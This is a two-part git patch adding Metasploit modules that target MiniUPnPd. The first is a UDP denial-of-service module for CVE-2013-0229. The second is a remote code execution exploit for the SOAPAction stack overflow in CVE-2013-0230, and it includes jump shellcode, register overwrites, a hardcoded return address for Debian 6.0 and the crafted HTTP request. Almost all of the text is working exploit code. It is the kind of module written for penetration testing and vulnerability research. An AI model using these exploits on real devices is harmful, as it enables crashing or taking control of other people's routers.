From 945dde3389c91536507e14ffc1d0e52a69fbe82c Mon Sep 17 00:00:00 2001
From: Dejan Lukan <dejan.lukan@viris.si>
Date: Fri, 17 May 2013 13:58:32 +0200
Subject: [PATCH 1/2] Added CVE-2013-0229 for MiniUPnPd < 1.4

---
 modules/exploits/multi/upnp/miniupnpd_dos.rb | 86 ++++++++++++++++++++
 1 file changed, 86 insertions(+)
 create mode 100644 modules/exploits/multi/upnp/miniupnpd_dos.rb

diff --git a/modules/exploits/multi/upnp/miniupnpd_dos.rb b/modules/exploits/multi/upnp/miniupnpd_dos.rb
new file mode 100644
index 0000000000..5d3fc903e2
--- /dev/null
+++ b/modules/exploits/multi/upnp/miniupnpd_dos.rb
@@ -0,0 +1,86 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#	 http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::Udp
+	include Msf::Auxiliary::Dos
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'						=>	'MiniUPnPd < 1,4 denial of service (DoS) exploit',
+			'Description'		 =>
+				%q{
+					This module allows remote attackers to cause a denial of service in MiniUPnP 1.0
+					server via specifically crafted UDP request. This vulnerability was identified
+					as CVE-2013-0229.
+				},
+			'Author'					=> [ 'Dejan Lukan' ],
+			'License'				 => MSF_LICENSE,
+			'Version'				 => '$Revision: 9999 $',
+			'References'			=> [
+				[ 'CVE', '2013-0229' ],
+				[ 'OSVDB', '89625' ],
+			],
+			'DisclosureData'	 => 'Mar 27 2013',
+		))
+
+		register_options(
+		[
+			Opt::RPORT(1900),
+		], self.class)
+	end
+
+	def run
+		# connect to the UDP port
+		connect_udp
+
+		# the M-SEARCH packet that is being read line by line: there shouldn't be CRLF after the
+		# ST line
+		sploit = "M-SEARCH * HTTP/1.1\r\n"\
+			"HOST: 239.255.255.250:1900\r\n"\
+			"ST:uuid:schemas:device:MX:3"
+
+		# the packet can be at most 1500 bytes long, so add appropriate number of ' ' or '\t'
+		# this makes the DoS exploit more probable, since we're occupying the stack with arbitrary
+		# characters: there's more chance that the the program will run off the stack.
+		sploit += ' '*(1500-sploit.length)
+
+		# send the exploit to the target
+		print_status("Sending malformed packet to #{rhost}...")
+		udp_sock.put(sploit)
+
+		# disconnect from the server
+		print_status("The target should be unresponsive now...")
+		disconnect_udp
+	end
+end
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+

From a47b69c71a3ec821ce5086e92ba92ba1fe4fd293 Mon Sep 17 00:00:00 2001
From: Dejan Lukan <dejan.lukan@viris.si>
Date: Fri, 17 May 2013 14:17:38 +0200
Subject: [PATCH 2/2] Added CVE-2013-0230 for MiniUPnPd 1.0 stack overflow
 vulnerability

---
 .../upnp/miniupnpd_stack_overflow_1.0.rb      | 156 ++++++++++++++++++
 1 file changed, 156 insertions(+)
 create mode 100644 modules/exploits/multi/upnp/miniupnpd_stack_overflow_1.0.rb

diff --git a/modules/exploits/multi/upnp/miniupnpd_stack_overflow_1.0.rb b/modules/exploits/multi/upnp/miniupnpd_stack_overflow_1.0.rb
new file mode 100644
index 0000000000..329317f3f6
--- /dev/null
+++ b/modules/exploits/multi/upnp/miniupnpd_stack_overflow_1.0.rb
@@ -0,0 +1,156 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#	 http://metasploit.com/
+##
+
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'						=>	'MiniUPnPd 1.0 stack overflow remote code execution',
+			'Description'		 =>
+				%q{
+					This module exploits the MiniUPnP 1.0 SOAP stack overflow vulnerability present
+					in the SOAPAction HTTP header. This vulnerability was identified as CVE-2013-0230.
+				},
+			'Author'					=> [ 'Dejan Lukan' ],
+			'License'				 => MSF_LICENSE,
+			'Version'				 => '$Revision: 9999 $',
+			'DefaultOptions'	=> { 'EXITFUNC' => 'process', },
+			# the byte '\x22' is the '"' character and the miniupnpd scans for that character in the
+			# input, which is why it can't be part of the shellcode (otherwise the vulnerable part 
+			# of the program is never reached)
+			'Payload'				 => { 'Space' => 2060, 'BadChars' => "\x00\x22", 'DisableNops' => true },
+			'Platform'				=> 'linux',
+			'References'			=> [
+				[ 'CVE', '2013-0230' ],
+				[ 'OSVDB', '89624' ],
+			],
+			'Targets'				 =>
+				[
+					#['Debian GNU/Linux 4.0', { 'Ret' => 0x0804c334, 'Offset' => 2123 }],
+					['Debian GNU/Linux 6.0', { 'Ret' => 0x0804ee43, 'Offset' => 2123 }],
+				],
+			'DefaultTarget'	 => 0,
+			'Privileged'			=> false,
+			'DisclosureData'	=> 'Mar 27 2013',
+			))
+
+			register_options(
+			[
+				Opt::RPORT(5555),
+			], self.class)
+	end
+
+
+	def check
+		packet = "M-SEARCH * HTTP/1.1\r\n \
+			HOST: 239.255.255.250:1900\r\n \
+			ST: ssdp:all\r\n \
+			MX:2\r\n \
+			MAN:\"ssdp:discover\"\r\n"
+	end
+
+
+	def exploit
+		#
+		# Build the SOAP Exploit
+		#
+		# jmp 0x2d ; jump forward 0x2d bytes (jump right after the '#' char)
+		sploit	= "\xeb\x2d"
+
+		# a valid action
+		sploit += "n:schemas-upnp-org:service:WANIPConnection:1#"
+
+		# payload
+		sploit += payload.encoded
+
+		# nops
+		#sploit += "\x90"*(target['Offset'] - sploit.length - 16)
+		sploit += rand_text(target['Offset'] - sploit.length - 16)
+
+		# overwrite registers on stack
+		sploit += "\x41\x41\x41\x41"		 # overwrite EBX
+		sploit += "\x42\x42\x42\x42"		 # overwrite ESI
+		sploit += "\x43\x43\x43\x43"		 # overwrite EDI
+		sploit += "\x44\x44\x44\x44"		 # overwrite EBP
+
+		# Overwrite EIP with addresss of "pop ebp, ret", because the second value on the
+		# stack points directly to the string after 'Soapaction: ', which is why we must
+		# throw the first value on the stack away, which we're doing with the pop ebp
+		# instruction. Then we're returning to the next value on the stack, which is
+		# exactly the address that we want.
+		sploit += [target.ret].pack('V')
+
+		# the ending " character is necessary for the vulnerability to be reached
+		sploit += "\""
+
+		# data sent in the POST body
+		data =
+			"<?xml version='1.0' encoding=\"UTF-8\"?>\r\n" +
+			"<SOAP-ENV:Envelope\r\n" +
+			"	SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
+			"	xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
+			"	xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\n" +
+			">\r\n" +
+			"<SOAP-ENV:Body>\r\n" +
+			"<ns1:action xmlns:ns1=\"urn:schemas-upnp-org:service:WANIPConnection:1\" SOAP-ENC:root=\"1\">\r\n" +
+			"</ns1:action>\r\n" +
+			"</SOAP-ENV:Body>\r\n" +
+			"</SOAP-ENV:Envelope>\r\n"
+
+
+		#
+		# Build and send the HTTP request
+		#
+		print_status("Sending exploit to victim #{target.name} at ...")
+		send_request_raw({
+			'uri'		 => target_uri.path,
+			'method'	=> 'POST',
+			'headers' => {
+				'SOAPAction' => sploit,
+				#'User-Agent' => 'Python-urllib/2.7',
+				#'Connection' => 'close',
+				#'Content-Type' => 'application/x-www-form-urlencoded',
+			},
+			'data'		=> data,
+		}, 25)
+
+
+		# handle the exploit
+		handler
+
+		# disconnect from the server
+		disconnect
+	end
+end
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+